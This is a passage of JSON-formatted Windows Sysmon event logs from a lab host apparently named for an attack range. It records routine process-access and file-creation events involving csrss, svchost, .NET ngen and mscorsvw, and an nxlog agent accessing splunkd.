4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7324,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:50.418\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1322-5F25-0000-00105AE40A00}\r\nTargetProcessId: 800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:50.418","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1322-5F25-0000-00105AE40A00}","TargetProcessId":"800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7325,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:50.418\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1322-5F25-0000-00105AE40A00}\r\nTargetProcessId: 800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:50.418","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1322-5F25-0000-00105AE40A00}","TargetProcessId":"800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7326,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:50.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:50.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7327,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:51.418\r\nProcessGuid: {E2A3D6B1-1322-5F25-0000-00105AE40A00}\r\nProcessId: 800\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\320-0\\Microsoft.GroupPolicy.Targeting.dll\r\nCreationUtcTime: 2020-08-01 07:00:51.418","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:51.418","ProcessGuid":"{E2A3D6B1-1322-5F25-0000-00105AE40A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\320-0\\Microsoft.GroupPolicy.Targeting.dll","CreationUtcTime":"2020-08-01 07:00:51.418","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7328,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.449\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-00105CE80A00}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.449","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-00105CE80A00}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7329,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.449\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-00105CE80A00}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.449","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-00105CE80A00}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7330,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.465\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-00105CE80A00}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.465","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-00105CE80A00}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7331,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.496\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-0010E0EB0A00}\r\nTargetProcessId: 4512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.496","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-0010E0EB0A00}","TargetProcessId":"4512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7332,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.496\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-0010E0EB0A00}\r\nTargetProcessId: 4512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 